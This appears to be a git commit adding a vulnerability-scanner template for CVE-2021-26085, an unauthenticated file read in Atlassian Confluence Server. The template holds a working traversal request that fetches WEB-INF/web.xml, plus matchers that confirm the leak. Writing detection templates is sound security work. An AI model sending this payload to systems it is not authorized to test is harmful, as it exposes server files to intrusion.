Create CVE-2021-26085.yaml

patch-1
Prince Chaddha 2021-12-20 15:20:14 +05:30 committed by GitHub
parent 2b2d18ab64
commit b8ee43e27a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2021-26085
info:
name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
author: princechaddha
severity: medium
description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
reference:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-26085
tags: cve,cve2021,confluence,atlassian,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/123cfx/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<display-name>Confluence</display-name>"
- "com.atlassian.confluence.setup.ConfluenceAppConfig"
condition: and